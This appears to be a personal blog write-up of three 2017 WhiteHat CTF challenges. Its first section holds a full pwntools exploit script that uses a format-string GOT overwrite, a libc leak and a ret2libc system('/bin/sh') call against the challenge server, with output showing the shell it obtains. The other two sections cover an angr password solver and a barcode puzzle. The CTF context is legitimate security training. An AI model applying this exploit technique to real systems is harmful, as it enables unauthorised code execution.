20170527_Whitehat_chall writeup

20170527_Whitehat_chall writeup

I have joined in WhiteHat challenge #13 in this weekend. Finally I solved 3 challs and got 400pt.

MuiNe

This chall is Pwn of Format string bug(FSB). This program just only echo user input once, and finish executtion.
This program may be run by ASLR. So I need to know libc address and pwn it, but this can only one echo.
How do I solve it?

 

At first, I try to run main function in one execution. If user input larger than expected, SSP check this in last part of execution.

In this check, __stack_chk_fail function will be call, so I overwrite got of __stack_chk_fail to main function address by FSB.

After overwrite, I can do many times echo (you need to input large string enough to call __stack_chk_fail function.).

# got of __stack_chk_fail to start of main function(0x0804851B) to be able to loop
data = p32(0x0804A014)+p32(0x0804A015)+p32(0x0804A016)+p32(0x0804A017)
data += “%11c%7$hhn”
data += “%106c%8$hhn”
data += “%127c%9$hhn”
data += “%4c%10$hhn”

 

Then I leak libc address information, and calculate system address(execute “p system” in gdb), /bin/sh address(execute “find /bin/sh” in gdb) , exit address(execute “p exit” in gdb) .

# Leak information by format string

data = “%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x”

 

r.sendline(data)

l = r.recvuntil(“echo “)

print l.split(“,”)[4]

 

# calculate offset of each address and add libc_base.

libc_base = int((“0x”+l.split(“,”)[4]),16) – 0x4538 #offset

system_addr = libc_base + 0x3ada0

bin_sh_addr = libc_base + 0x15b82b

exit_addr = libc_base + 0x2e9d0

 

print hex(libc_base)

 

Finally I execute system function by stack buffer overflow(BoF), but I can’t do because “lea     esp, [ecx-4] ” in the last part of main function change esp to another part that I can’t set by BoF.

So to avoid this, I try to call leave function to skip stack pointer to the place where I BoFed by overwriting got of __stack_chk_fail function again.

 

All of the script is as below.

from pwn import *
target = “formatme.wargame.whitehat.vn”
port = 1337
r = remote(target, port)
raw_input()
l = r.recvuntil(“echo “)
print l
# got of __stack_chk_fail to start of main function(0x0804851B) to be able to loop
data = p32(0x0804A014)+p32(0x0804A015)+p32(0x0804A016)+p32(0x0804A017)
data += “%11c%7$hhn”
data += “%106c%8$hhn”
data += “%127c%9$hhn”
data += “%4c%10$hhn”
print data
r.sendline(data)
l = r.recvuntil(“echo “)
# Leak information by format string
data = “%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x”
r.sendline(data)
l = r.recvuntil(“echo “)
print l.split(“,”)[4]
# calculate offset of each address and add libc_base.
libc_base = int((“0x”+l.split(“,”)[4]),16) – 0x4538 #offset
system_addr = libc_base + 0x3ada0
bin_sh_addr = libc_base + 0x15b82b
exit_addr = libc_base + 0x2e9d0
print hex(libc_base)
”’
 At first need to avoid below.
_text:080485A3 03C 8B 4D FC       mov     ecx, [ebp+var_4]
_text:080485A6 03C C9             leave
_text:080485A7 000 8D 61 FC       lea     esp, [ecx-4]
So I use below gadget to avoid above part
0x08048488: leave  ; rep ret  ;  (1 found)
and execute system function
”’
data = “AAAA”*4*3+p32(system_addr)+p32(exit_addr)+p32(bin_sh_addr)
data += p32(0x0804A017)+p32(0x0804A016)+p32(0x0804A015)+p32(0x0804A014)
data += “%188c%22$hhn”
data += “%252c%23$hhn”
data += “%128c%24$hhn”
data += “%4c%25$hhn”
print data
r.sendline(data)
r.interactive()

 

$ python solve_fomat_me.py
[+] Opening connection to formatme.wargame.whitehat.vn on port 1337: Done
echo
\x14\xa0\x0\x15\xa0\x0\x16\xa0\x0\x17\xa0\x0%11c%7$hhn%106c%8$hhn%127c%9$hhn%4c%10$hhn
f75cc538
0xf75c8000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0-`��i_�+8r��\x16\xa0\x0\x15\xa0\x0\x14\xa0\x0%188c%22$hhn%252c%23$hhn%128c%24$hhn%4c%25$hhn
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0-`��i_�+8r��\x16\xa0\x0\x15\xa0\x0\x14\xa0\x0                                                                                                                                                                                           \x00                                                                                                                                                                                                                                                                                                                                                                                          \x0
$
$
$
$ ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
my_ssh_key
my_ssl_key
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
$ cd home
$ ls
format_me
ubuntu
$ cd format_me
$ ls
flag
format_meb1946ac92492d2347c6235b4d2611184
$ cat flag
%n_was_a_good_idea?
$

 

Finally I got flag and calculate SHA1(“%n_was_a_good_idea?”).

 

Tuy Hoa

 

This is the RE problem that is able to solve by angr.

 

I find out that I can get flag if go through 0x400ea8. And if password wrong, go to 0x40096d.

 

Screenshot_1

Screenshot_2
So I write script by using angr as below.
import angr
def main():
    p = angr.Project(“./re100”, load_options={‘auto_load_libs’: False})
    ex = p.surveyors.Explorer(find=(0x400EA8, ), avoid=(0x40096D,))
    ex.run()
    return ex.found[0].state.posix.dumps(0).strip(‘\0\n’)
def test():
    assert main() == ”
if __name__ == ‘__main__’:
    print main()

 

$ python solve_re100.py
5a62af9a23b56ee49370808a0cf1e8096757257@@@@@@@@@@@@@@@
@@@@
$ ./re100
input password:
5a62af9a23b56ee49370808a0cf1e80967572570
Good password!!!

 

 

Hue

 

This is the problem that is related to several barcode.

 

 

At first I am given one password locked ZIP file and many PNG files that contain country flag.

In many image files, There are strange file that seems part of QR code. So I try to recover them.

 

And decode it, then get ZIP password.

 

Then I get below image file. I remember problem description again, and there is strange string “Dot Code”.

 

 

I google it and get solver of DotCode

 

http://ift.tt/2qvPodn

(You need to install it to Android/iOS, and don’t forget set dotcode enable in setting)

 

And get flag.

 

Advertisements

1 thought on “20170527_Whitehat_chall writeup”

  1. Instead of finding “/bin/sh”, you could also overwrite the address of the “echo” string which was passed to printf() with “sh”.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s